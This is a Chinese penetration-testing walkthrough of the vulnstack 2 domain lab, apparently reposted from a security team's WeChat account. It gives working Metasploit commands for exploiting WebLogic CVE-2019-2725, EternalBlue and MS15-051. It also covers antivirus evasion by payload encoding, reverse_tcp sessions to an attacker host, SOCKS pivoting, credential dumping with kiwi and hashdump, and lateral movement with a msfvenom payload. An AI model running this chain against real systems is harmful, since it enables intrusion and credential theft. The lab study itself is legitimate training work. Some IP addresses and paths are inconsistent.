揽月安全团队发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途及盈利等目的，否则后果自行承担！！！！！

1、DC配置

DC是域控，只能内网访问，只有一块网卡，设置如下

2、PC配置

两块网卡，一块nat模式(模拟外网连接)，一块自定义模式（同DC，模拟内网域）

3、WEB设置

两块网卡，一块NAT模式，一块自定义模式（同DC）

用户delayAdministrator登录密码：1qaz@WSX，进入系统修改模拟外网连接的网卡设置，改为自动获取ip（同PC）。

以管理员权限运行:C:OracleMiddlewareuser_projectsdomainsbase_domainbinstrartWebLogic.cmd

打开物理机访问192.168.88.200:7001，测试WEB机的Weblogic服务是否运行成功，若出现以下界面则表示运行成功

Web渗透

信息收集

1.namp扫描

使用nmap扫描存活主机：nmap -sn 192.168.88.0/24，发现两台主机，分别是192.168.194和192.168.88.200

扫描第一个主机：nmap -p- 192.168.88.194，这台机器应该是员工区的PC机

扫描另一个主机的开放端口：nmap -p- 192.168.88.200，http服务的80端口，mssql的1433端口，远程登录服务的3389端口，以及weblogic的7001端口，猜测这台机器很可能是web服务器

扫描指定端口的常见漏洞：nmap --script=vuln -p 80,135,139,445,1688,3389,7001 192.168.88.200，发现永恒之蓝ms17-010漏洞

nmap --script=vuln -p 135,139,445,3389 192.168.88.194, pc机也发现了永恒之蓝漏洞

2.dirsearch目录爆破

对web主机进行目录爆破，先爆80端口：python3 dirsearch.py -u http://192.168.88.200 -e* -x 403,404，没有可用信息

继续爆weblogic服务的7001端口：python3 dirsearch.py -u http://192.168.88.200:7001 -e* -x 403,404

访问控制台登录页面：/console/login/LoginForm.jsp，爆出敏感信息：weblogic的版本号为10.3.3.0

3.weblogic漏洞扫描

使用weblogic漏扫工具扫描：python3 WeblogicScan.py 192.168.47.129 7001，爆出CVE-2017-3506以及CVE-2019-2725，均为远程代码执行漏洞

漏洞利用

1.ms07010漏洞利用

尝试使用MSF的ms17010远程命令执行EXP，但是失败了，估计是被360拦截掉了

换另外一个EXP，尝试返回目标主机的meterpreter会话：use exploit/windows/smb/ms17_010_eternalblue ，但还是失败了，在web机可以看到是被360拦截了

2.weblogic漏洞利用

msf搜索与weblogic相关的漏洞，根据之前漏扫爆出来的漏洞编号选择对应的年份(2017和2019)，此处选择2019的

这里需修改EXP的设置, 由于目标主机是windows，需将target设为1，其他设置如下图所示，成功返回一个meterpreter会话，也能够正常获取uid， 但是很快就被360干掉了

3、写入webshell

尝试一键写入webshell，利用CVE-2016-3510_T3漏洞，漏洞利用成功 (此webshell默认密钥为key)

上传msf生成的木马，立马被360查杀掉了, 因此需对其做免杀处理, 此处我用到的免杀技术为动态调用api函数加载shellcode

上传免杀后的木马并执行, msf成功接收到meterpreter

后渗透

内网信息收集

1、先将fscan.exe上传至目标主机

2、进入cmd shell命令执行：ipconfig /all，meterpreter执行命令sysinfo来获取目标系统的基本信息，此处获取到的信息整理如下：

主机名: WEB

当前域：de1ay

内网ip地址：10.10.10.80

DNS服务器地址：10.10.10.10

OS：Windows 2008 R2

系统架构：64位

内网漏洞扫描

1、使用fscan.exe扫描内网存活ip以及进行漏洞扫描：fscan.exe -h 10.10.10.1/24，发现内网的另一个IP是10.10.10.10，这个IP应该就是域控服务器的IP了，因为DNS服务器通常为域控服务器，而且这个域控服务器还存在永恒之蓝漏洞

2、漏洞利用

通过脚本探测发现存在CVE-2019-2725，我们可以使用网上的exp，这里我们使用msf自带的漏洞利用模块：

use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
set target Windows
set payload windows/x64/meterpreter/reverse_tcp
set rhosts 192.168.111.80
set lhost 192.168.111.128
run

3、这里还需要在advanced选项中对payload进行简单的编码：

setg EnableStageEncoding true
setg StageEncoder x64/zutto_dekiru

4、成功返回meterpreter。

这里我们做编码的目的是为了绕过360，网上也有一些其它免杀的方式，大家可以自行学习，这里使用的msf的自免杀，使用x64/zutto_dekiru编码绕过。

权限提升

1、在我们成功返回shell后，发现我们当前是普通用户权限，如果要完全控制这台机器，需要进一步提权。

切换目录到C:Usersde1ay下，使用meterpreter上传Sherlock脚本：

cd C:/Users/de1ay
upload Sherlock.ps1

2、进入shell模式，使用Sherlock脚本探测可用于本地提权的漏洞：

powershell.exe -exec bypass -Command "Find-AllVulns}"

3、这里我们通过Sherlock脚本发现存在MS15-051相关漏洞，使用msf自带的利用模块提权：

use exploit/windows/local/ms15_051_client_copy_image
set payload windows/x64/meterpreter/reverse_tcp
set session 1
set target Windows x64
set lhost 192.168.111.128
run

4、提权成功：

设置代理

1、在对内网进行了初步的信息收集后，我们要开始攻击内网主机了，但是内网中的机器和我们的攻击机并不处于同一网络当中，所以要通过Web服务器建立代理，这里有很多内网穿透工具可以使用，如ew、frp、chisel等，我这里直接使用msf建立路由，并开启socks代理。

建立路由：
route add 10.10.10.0 255.255.255.0 1

开启socks代理：
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 9050
set version 4a
run

配置代理工具proxychains4：
vim /etc/proxychains4.conf

2、这样，我们就可以使用msf以及设置了代理的其它工具攻击内网中的主机了。

在信息收集时，我们使用了ping命令简单探测了一下内网连通性，发现PC机无法ping通，这可能是防火墙阻止了ICMP协议，这里我们通过代理使用nc命令探测，发现可以连通，说明防火墙并没有阻止TCP协议的流量。

proxychains4 nc -zv 10.10.10.80 135
proxychains4 nc -zv 10.10.10.201 135

3、发现防火墙并没有拦截TCP流量后，我们就可以使用TCP协议进行数据传输了。

横向移动

1、上面信息收集到了两台机器都开启了445端口也扫描出来存在永恒之蓝漏洞

2、尝试使用msf内置的漏洞利用模块

use exploit/windows/smb/ms17_010_psexec
set rhosts 10.10.10.10
set payload windows/x64/meterpreter/bind_tcp
set lport 443
run

3、域控制器执行成功，域内成员机PC执行失败：

域内成员机PC我们没有通过永恒之蓝漏洞拿下来，这里采用其它方法，首先我们在之前的Web服务器上加载kiwi，提取服务器上储存的密码：

sessions 2
load kiwi
creds_all

4、我们成功提取到了两个账号的明文密码，但是这里没有域管理员的账号密码。

这里我们使用smart_hashdump模块提取域控中的哈希：

use post/windows/gather/smart_hashdump
set session 2
run

5、成功提取到了域内成员的hash值，并且我们发现域管理员的hash和其它域成员的hash相同，这说明域管理员使用了和域成员相同的密码（该靶场存在密码复用，如果密码不相同，我们可以通过哈希传递进行横向移动），这样我们可以就获得了域管理员的账号密码。

我们先使用msf生成一个木马：

msfvenom -p windows/meterpreter/bind_tcp lport=443 -f vbs -e x86/shikata_ga_nai -o /tmp/msf.vbs

6、然后，将该木马上传到已经被我们控制的web服务器上：

7、进入shell，与PC主机建立IPC$连接

net use \10.10.10.201ipc$ "1qaz@WSX" /user:[email protected]

8、将上传的木马复制到PC机C盘目录下：

copy msf.vps \10.10.10.201c$

9、通过端口扫描发现pc开启了3389端口：

10、在msf上开启监听

use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set stageencoder x86/shikata_ga_nai
set rhosts 10.10.10.201
set lport 443
run

11、连接PC机的远程桌面，使用域管理员账号登录PC，上线msf：

proxychains4 rdesktop 10.10.10.201:3389

到此，我们已经控制了域内全部主机。

原文始发于微信公众号（揽月安全团队）：vulnstack——2